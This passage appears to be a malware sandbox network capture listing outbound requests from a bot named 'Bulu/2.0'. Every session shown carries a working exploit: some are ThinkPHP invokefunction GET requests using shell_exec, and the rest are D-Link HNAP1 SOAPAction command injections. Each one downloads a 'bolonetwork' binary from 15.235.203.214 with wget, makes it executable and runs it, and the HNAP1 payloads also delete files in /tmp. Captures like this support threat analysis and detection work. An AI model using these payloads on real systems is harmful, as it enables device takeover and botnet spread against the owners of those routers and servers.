                                      112192.168.2.235601695.60.51.6780
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.824229002 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      113192.168.2.2347596198.50.246.468081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.826133013 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      114192.168.2.2357272153.129.111.298081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.830970049 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      115192.168.2.233385095.87.70.2580
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.832257986 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      116192.168.2.234856669.135.152.588081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.834579945 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      117192.168.2.233568279.87.222.2478081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.839498997 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      118192.168.2.235818695.36.82.7380
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.841150045 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      119192.168.2.2339450110.90.71.2508081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.843775988 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      120192.168.2.2336944162.88.219.2068081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.849150896 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      121192.168.2.234947095.199.108.16680
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.850862980 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      122192.168.2.234150249.49.107.768081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.853503942 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      123192.168.2.2341362157.217.88.368081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.858823061 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      124192.168.2.235260695.29.14.11180
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.860387087 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      125192.168.2.2353678103.122.90.2208081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.862931013 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      126192.168.2.2339770182.241.162.148081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.868673086 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
